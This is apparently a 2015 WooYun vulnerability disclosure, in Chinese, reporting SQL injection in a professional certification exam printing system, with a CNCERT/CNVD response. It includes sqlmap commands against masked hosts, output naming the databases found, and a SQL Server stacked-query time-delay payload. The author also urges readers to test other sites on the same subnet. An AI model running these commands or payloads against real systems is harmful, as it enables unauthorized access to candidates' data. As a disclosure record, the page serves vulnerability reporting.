当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135703

漏洞标题:某从业人员资格认证系统存在SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: flowind

提交时间:2015-08-24 23:00

修复时间:2015-10-10 18:38

公开时间:2015-10-10 18:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-24: 细节已通知厂商并且等待厂商处理中
2015-08-26: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开

简要描述:

RT

详细说明:

**.**.**.**考试系统注入漏洞..包括整个c网下的所有网站都有类似漏洞
具体到底有多少自己去验证.都是一套系统..
至于影响范围 不多说了吧..
注入点
sqlmap.py -u "http://**.**.**.**/PRINT/Pages/PrinterManage/Imgages.aspx?ExamcertId=&Candidateid=0&CertId=0&CertTypeID=1"
**.**.**.**:7921/ccbp11admin/PrintExamCert.aspx?CandidateCode=asdfasd&UserName=asdasdasd&CheckKey=54eb80175fc760def339439c0dfadffa
current database: 'CCBP1120141017'
sqlmap.py -u "http://**.**.**.**/PRINT/Pages/PrinterManage/Imgages.aspx?ExamcertId=&Candidateid=0&CertId=0&CertTypeID=1" --dbs
current database: 'CCBP20070913'
简单2个..其他的自测...

漏洞证明:

sqlmap.py -u "http://**.**.**.**/PRINT/Pages/PrinterManage/Imgages.aspx?ExamcertId=&Candidateid=0&CertId=0&CertTypeID=1" --current-db

111.jpg


sqlmap.py -u "**.**.**.**:7921/ccbp11admin/PrintExamCert.aspx?CandidateCode=asdfasd&UserName=asdasdasd&CheckKey=54eb80175fc760def339439c0dfadffa"
GET parameter 'UserName' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 376 HTTP(s) requests:
---
Parameter: UserName (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: CandidateCode=asdfasd&UserName=asdasdasd';WAITFOR DELAY '0:0:5'--&CheckKey=54eb80175
---
缺点利用比较缓慢..
好吧...不登陆不能搜索了..只有厚脸皮求邀请了..

修复方案:

版权声明:转载请注明来源 flowind@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-08-26 18:37

厂商回复:

CNVD确认所述情况,已经转由CNCERT直接通报给对应银行集团公司,由其后续协调网站管理部门处置.

最新状态:

暂无